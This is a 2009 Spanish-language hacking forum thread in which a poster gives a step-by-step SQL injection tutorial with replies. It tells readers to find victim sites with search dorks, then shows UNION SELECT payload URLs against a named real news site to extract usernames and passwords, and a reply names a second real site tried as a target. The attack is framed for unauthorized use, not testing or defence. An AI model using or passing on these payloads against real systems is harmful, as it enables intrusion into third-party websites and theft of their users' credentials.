Tutorial sql injection By ShadinessDark

gfxgfx
 
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación?

Ingresar con nombre de usuario, contraseña y duración de la sesión
 
gfx gfx
gfx
21208 Mensajes en 4872 Temas por 20719 Usuarios - Último usuario: goleDewsDycle Mayo 20, 2012, 01:35:45
*
gfx*InicioAyudarssBuscarCalendarioIngresarRegistrarsegfx
gfxgfx
0 Usuarios y 1 Visitante están viendo este tema.       « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Tutorial sql injection By ShadinessDark  (Leído 1218 veces)
shadinessdark
Principiantes
*
Desconectado Desconectado

Mensajes: 18


Ver Perfil WWW
Tutorial sql injection By ShadinessDark
« en: Junio 15, 2009, 20:52:57 »

Fuente: Www.System-Black.Com
Bueno amigo aca te traigo el otro hecho por mi Cheesy

Hahahahaha estaba haciendo uno pero muy bueno
se me fue la luz
y no guardo pero hice este espero ser especifico en todo

....

Bueno are un ejemplo mas facil para que entiendan bien este tutorial!!! de mi brother Zero Bits

Primero que todo saludos a los hackxCrack
y principalmente a mi team Venezuela [R00t] Team
Je  bueno vi que algunas personas no entendieron el tutorial de mi bro se los explicare

Primero que todo busquemos una victima

Yo la buscare alazar...
Vamos a google colocamos noticias.php?id=    notas.php?id=  videos.php?id= etc...


nos saldran varias paginas en mi caso  les pondre una de ejemplo =)

Bueno despues que entren a una de ellas

en mi caso consegui esta
http://www.diariopuerto.com/noticias.php?id=

a lo ultimo para ver si es vulnerable ponemos el '
quedaria asi

http://www.diariopuerto.com/noticias.php?id='

Nos saldra el siguiente error si es vulnerable


si nos sale ese error quitamos el '  y agregamos lo siguiente:

http://www.diariopuerto.com/noticias.php?id=-1+union+select+0,1,2,3,4,5,6,7,8,9

Asi hasta que nos tire los numeros en mi caso me tiro


les quedaria algo asi como en la imagen Cheesy

a uds les podria tirar  1 2 3 4 5 6 7  etc... jejeje por hay es donde sacaremos el user! y la pass!

Luego de esto vamos a lo ultimo y colocamos +from+usuarios
o usuario o email emails mails mail etc...

a mi me quedo asi http://www.diariopuerto.com/noticias.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuarios

Luego saquemos usuario y pass

http://www.diariopuerto.com/noticias.php?id=-1+union+select+usuario,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuarios
Se dan cuenta que cambie el 1 por usuario?
Bueno eso lo hago para que me tire el usuario luego se daran cuenta que les saldra el usuario =)

Para sacar la pass quitamos usuario y ponemos lo siguiente
concat(usuario,0x3a3a,pass)

quedaria asi

http://www.diariopuerto.com/noticias.php?id=-1+union+select+concat (usuario,0x3a3a,pass),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuarios

Si con pass no les agarra intenten con password o clave , contraseña , claves  etc....

aca nos dara pass y user Cheesy

Bueno hay otra forma que es sacando la tabla pero  es mas trabajo no?
ejejejejeejejejejejeejejejejejeeje
bueno la tabla se ve como se saca en el tutorial de mi brother Zero Bist aunque si le sacas
el from no es necesario que saques las tablas =P
Espero haberme explicado bien cualquier cosa me avisan jejejejeje
este tutorial se los hago porque  hay algunos que me han dicho que no entienden el de mi brother!!!

Saludos...
Especiales
a mi team!!!!
Venezuela [R00t] Team

Zero Bits
Zero-R00t
Jeferx
eDeex_
K4mus23
VirtualHack
Mnadito0
Kuter
K41S3R
Black Killer


...........................................................
Venezuela [R00t] Team & System Black Team
En línea
pjosuk
Principiantes
*
Desconectado Desconectado

Mensajes: 29



Ver Perfil
Re: Tutorial sql injection By ShadinessDark
« Respuesta #1 en: Junio 15, 2009, 23:24:54 »

Oye otra vez  te menciono hicieron una buena muy buena revista,
(casi la termino me faltan solo 3 temas)
me agrado eso de programación pues por esos rumbos.............
y lo de arriba total mente entendible..

salu2.....
En línea
andru1989
HdL Beta
***
Desconectado Desconectado

Mensajes: 298



Ver Perfil WWW
Re: Tutorial sql injection By ShadinessDark
« Respuesta #2 en: Junio 16, 2009, 19:40:39 »

mira home yo probe con esta pagina y supuestamente tiene vulnerabilidad pero no me funciona el resto

http://www.segib.org/noticias.php?id='

si no me da el resto quiere decir que no es vulnerable o que

saludos

En línea

shadinessdark
Principiantes
*
Desconectado Desconectado

Mensajes: 18


Ver Perfil WWW
Re: Tutorial sql injection By ShadinessDark
« Respuesta #3 en: Junio 18, 2009, 19:28:42 »

mira home yo probe con esta pagina y supuestamente tiene vulnerabilidad pero no me funciona el resto

http://www.segib.org/noticias.php?id='

si no me da el resto quiere decir que no es vulnerable o que

saludos




No le sigas a esa web Grin  como puedes ver he sacado 90 columnas y no ha pasado nada xD

Citar
Oye otra vez  te menciono hicieron una buena muy buena revista,
(casi la termino me faltan solo 3 temas)
me agrado eso de programación pues por esos rumbos.............
y lo de arriba total mente entendible..


Muchas gracias... asi se que vamos bien jejejeje saludos y cualquier cosa me avisas
En línea
Phantom Lord
Administrator
*****
Desconectado Desconectado

Mensajes: 3.019



Ver Perfil WWW
Re: Tutorial sql injection By ShadinessDark
« Respuesta #4 en: Julio 30, 2009, 03:21:52 »

Creo qeu faltan aclarar varias cosas en este tutorial , luego aclaro algunas que te quedaron en el tintero me parece, ya son las 4.21 y me voy a dormir .

Salu2
En línea

Click En la imagen Para ingresar A Mi Web - Sumate a la comunidad Fantasma
[u]nsigned
Super Usuario
***
Desconectado Desconectado

Mensajes: 341


Download profile...


Ver Perfil
Re: Tutorial sql injection By ShadinessDark
« Respuesta #5 en: Julio 30, 2009, 16:56:48 »

Creo qeu faltan aclarar varias cosas en este tutorial , luego aclaro algunas que te quedaron en el tintero me parece, ya son las 4.21 y me voy a dormir .

Salu2


Por ejemplo que el USER y PASSWORD que se consiguen son los de MySQL.  Grin.

Si les interesa aprender sobre Inyecciones les recomiendo leerse ESTE paper. (Espero no se tome como SPAM).

Saludos
En línea



No me interesa romper ventanas, me interesa criar pingüinos
rehizner
User Nuevo
*
Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Tutorial sql injection By ShadinessDark
« Respuesta #6 en: Septiembre 04, 2009, 14:21:52 »

« Última modificación: Septiembre 04, 2009, 14:30:57 por rehizner » En línea
gfx
Páginas: [1] Ir Arriba Imprimir 
gfx
Ir a:  
gfx
Powered by SMF 1.1.16 | SMF © 2006, Simple Machines
HDL Group hackers

gfx